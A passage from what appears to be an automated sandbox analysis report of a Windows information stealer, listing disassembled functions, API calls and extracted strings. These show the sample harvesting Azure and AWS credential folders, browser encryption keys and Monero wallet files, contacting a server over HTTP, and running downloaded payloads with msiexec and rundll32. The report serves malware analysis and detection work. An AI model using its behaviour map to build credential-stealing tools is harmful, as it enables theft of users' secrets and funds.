                            • Instruction Fuzzy Hash: 6AE12371800109ABDB15EBA4EC99FEEBB78BFD4300F008159F11A67191DF346A4ADF66
                            Function 005712D0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 310COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID: @$H$`
                            • API String ID: 2001356338-3031705493
                            • Opcode ID: d4e73c2cc197b923a4943e6a795c086d277f80dc97b3c2104acb763f22d3cfb6
                            • Instruction ID: 5b76c140da8c597fafb6eb3ae2f33eabbb52e3034e8637feb6fac7eda88d7250
                            • Opcode Fuzzy Hash: d4e73c2cc197b923a4943e6a795c086d277f80dc97b3c2104acb763f22d3cfb6
                            • Instruction Fuzzy Hash: 92C182B5900119ABCB14EF60EC8DFEE7B78BBD4304F008598E50E67141EB74AA85DFA5
                            Function 00578320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • RegOpenKeyExA.ADVAPI32(00000000,00E4B188,00000000,00020019,00000000,005805B6), ref: 005783A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00578426
                            • wsprintfA.USER32 ref: 00578459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0057847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0057848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00578499
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 33e97b89351ef061f255101b249737764a28662de02444d05a558262646f5a33
                            • Instruction ID: 682a4d17dcad65860f466161b0be5ba825546b5fa6563e721b9f8dd00cdbe864
                            • Opcode Fuzzy Hash: 33e97b89351ef061f255101b249737764a28662de02444d05a558262646f5a33
                            • Instruction Fuzzy Hash: B9813E71910118ABDB64DB64DC95FEE7BB8FF88700F00C698E109A6180DF746B89DFA5
                            Function 00579010 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0057906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: 8$image/jpeg
                            • API String ID: 2244384528-1445462635
                            • Opcode ID: e695301b44803ceef6a5a2ceab7d9066e809449590a0c7dda7636411562f480f
                            • Instruction ID: 4eaac597cb900e9d5ac7967c90f0f5681b01a273be35286b20dddbeb0347bcde
                            • Opcode Fuzzy Hash: e695301b44803ceef6a5a2ceab7d9066e809449590a0c7dda7636411562f480f
                            • Instruction Fuzzy Hash: 4B71FF75910209ABDB04EFE4DC89FEEBBB9BF88700F148508F515A7290DB389905DF65
                            Function 00574D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00574DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00574DCD
                              • Part of subcall function 00574910: wsprintfA.USER32 ref: 0057492C
                              • Part of subcall function 00574910: FindFirstFileA.KERNEL32(?,?), ref: 00574943
                            • lstrcat.KERNEL32(?,00000000), ref: 00574E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00574E59
                              • Part of subcall function 00574910: StrCmpCA.SHLWAPI(?,00580FDC), ref: 00574971
                              • Part of subcall function 00574910: StrCmpCA.SHLWAPI(?,00580FE0), ref: 00574987
                              • Part of subcall function 00574910: FindNextFileA.KERNEL32(000000FF,?), ref: 00574B7D
                              • Part of subcall function 00574910: FindClose.KERNEL32(000000FF), ref: 00574B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00574EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00574EE5
                              • Part of subcall function 00574910: wsprintfA.USER32 ref: 005749B0
                              • Part of subcall function 00574910: StrCmpCA.SHLWAPI(?,005808D2), ref: 005749C5
                              • Part of subcall function 00574910: wsprintfA.USER32 ref: 005749E2
                              • Part of subcall function 00574910: PathMatchSpecA.SHLWAPI(?,?), ref: 00574A1E
                              • Part of subcall function 00574910: lstrcat.KERNEL32(?,00E4EA98), ref: 00574A4A
                              • Part of subcall function 00574910: lstrcat.KERNEL32(?,00580FF8), ref: 00574A5C
                              • Part of subcall function 00574910: lstrcat.KERNEL32(?,?), ref: 00574A70
                              • Part of subcall function 00574910: lstrcat.KERNEL32(?,00580FFC), ref: 00574A82
                              • Part of subcall function 00574910: lstrcat.KERNEL32(?,?), ref: 00574A96
                              • Part of subcall function 00574910: CopyFileA.KERNEL32(?,?,00000001), ref: 00574AAC
                              • Part of subcall function 00574910: DeleteFileA.KERNEL32(?), ref: 00574B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: a674c68ce7c7f331533e0ed7a8d3e6a53210670bac538f6ec2340f2e0d335a0f
                            • Instruction ID: 7aeb53e2b0fc2edcef122e9eb7de0ed63c28065ab6ac091f18a67ba71b3a2a3a
                            • Opcode Fuzzy Hash: a674c68ce7c7f331533e0ed7a8d3e6a53210670bac538f6ec2340f2e0d335a0f
                            • Instruction Fuzzy Hash: D041A37A940208A7D750F770EC4BFED7A38BBA4700F008454B68A660C1EEB45BC99B97
                            Function 00574280 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 204stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 005742EC
                            • lstrcat.KERNEL32(?,00E4E2C0), ref: 0057430B
                            • lstrcat.KERNEL32(?,?), ref: 0057431F
                            • lstrcat.KERNEL32(?,00E4CFD8), ref: 00574333
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 00578D90: GetFileAttributesA.KERNEL32(00000000,?,00561B54,?,?,0058564C,?,?,00580E1F), ref: 00578D9F
                              • Part of subcall function 00569CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00569D39
                              • Part of subcall function 005699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                              • Part of subcall function 005699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                              • Part of subcall function 005699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                              • Part of subcall function 005699C0: ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                              • Part of subcall function 005699C0: LocalFree.KERNEL32(0056148F), ref: 00569A90
                              • Part of subcall function 005699C0: CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                              • Part of subcall function 005793C0: GlobalAlloc.KERNEL32(00000000,005743DD,005743DD), ref: 005793D3
                            • StrStrA.SHLWAPI(?,00E4E170), ref: 005743F3
                            • GlobalFree.KERNEL32(?), ref: 00574512
                              • Part of subcall function 00569AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569AEF
                              • Part of subcall function 00569AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00564EEE,00000000,?), ref: 00569B01
                              • Part of subcall function 00569AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569B2A
                              • Part of subcall function 00569AC0: LocalFree.KERNEL32(?,?,?,?,00564EEE,00000000,?), ref: 00569B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 005744A3
                            • StrCmpCA.SHLWAPI(?,005808D1), ref: 005744C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 005744D2
                            • lstrcat.KERNEL32(00000000,?), ref: 005744E5
                            • lstrcat.KERNEL32(00000000,00580FB8), ref: 005744F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID: p
                            • API String ID: 3541710228-2678736219
                            • Opcode ID: 0aec855931c3272de8ad474febd5a5b8bcf9caaf3a2dcd725349dbf9752d2f08
                            • Instruction ID: 46f1b8fa1207cd01480733808c5f4a39ed0fe265004b6b8e7f070a4083c48446
                            • Opcode Fuzzy Hash: 0aec855931c3272de8ad474febd5a5b8bcf9caaf3a2dcd725349dbf9752d2f08
                            • Instruction Fuzzy Hash: BB712476900219ABDB54EBA0EC49FEE7779BBC8300F048598F60997181EB34DB45DF91
                            Function 00572E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 005731C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0057335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 005734EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: d92d33031db7097a3992cc79ffe716503686cd4c432a4a84a92abd6397d2a717
                            • Instruction ID: b7896d66d5b329bb3332931977d45c5c82d70f41e727182a976d803b9a9f1db4
                            • Opcode Fuzzy Hash: d92d33031db7097a3992cc79ffe716503686cd4c432a4a84a92abd6397d2a717
                            • Instruction Fuzzy Hash: 6F12F0718001099ADB15FBA0EC5AFEE7B38BFD4300F508159F51A66195EF342B4ADF52
                            Function 005752C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 00566280: InternetOpenA.WININET(00580DFE,00000001,00000000,00000000,00000000), ref: 005662E1
                              • Part of subcall function 00566280: StrCmpCA.SHLWAPI(?,00E4EA18), ref: 00566303
                              • Part of subcall function 00566280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00566335
                              • Part of subcall function 00566280: HttpOpenRequestA.WININET(00000000,GET,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00566385
                              • Part of subcall function 00566280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005663BF
                              • Part of subcall function 00566280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005663D1
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00575318
                            • lstrlen.KERNEL32(00000000), ref: 0057532F
                              • Part of subcall function 00578E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00578E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00575364
                            • lstrlen.KERNEL32(00000000), ref: 00575383
                            • lstrlen.KERNEL32(00000000), ref: 005753AE
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 9a9320012991ea82054f1e4f2c21010a19e8db695c84b6104f2798a8ae826893
                            • Instruction ID: b7b34d5bbe587897ce9e1c109a43011bb3f9c58a7a614b9c5acc31d1ae4106bf
                            • Opcode Fuzzy Hash: 9a9320012991ea82054f1e4f2c21010a19e8db695c84b6104f2798a8ae826893
                            • Instruction Fuzzy Hash: 1351FE3091014A9BDB14FF60ED9AAEE7B79BFD0301F508014E41E5A591EF346B46EB52
                            Function 00561310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 005612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005612B4
                              • Part of subcall function 005612A0: RtlAllocateHeap.NTDLL(00000000), ref: 005612BB
                              • Part of subcall function 005612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005612D7
                              • Part of subcall function 005612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005612F5
                              • Part of subcall function 005612A0: RegCloseKey.ADVAPI32(?), ref: 005612FF
                            • lstrcat.KERNEL32(?,00000000), ref: 0056134F
                            • lstrlen.KERNEL32(?), ref: 0056135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00561377
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 00578B60: GetSystemTime.KERNEL32(00580E1A,00E4A930,005805AE,?,?,005613F9,?,0000001A,00580E1A,00000000,?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 00578B86
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00561465
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                              • Part of subcall function 005699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                              • Part of subcall function 005699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                              • Part of subcall function 005699C0: ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                              • Part of subcall function 005699C0: LocalFree.KERNEL32(0056148F), ref: 00569A90
                              • Part of subcall function 005699C0: CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 005614EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 9e17343302716bf393d6886787d20b1f12be9005a54ad7f5eea6bbb1b45b40f4
                            • Instruction ID: eee0b4529814e875dabc0a04f9993184c217d0d10f5514d9bda946eda459203e
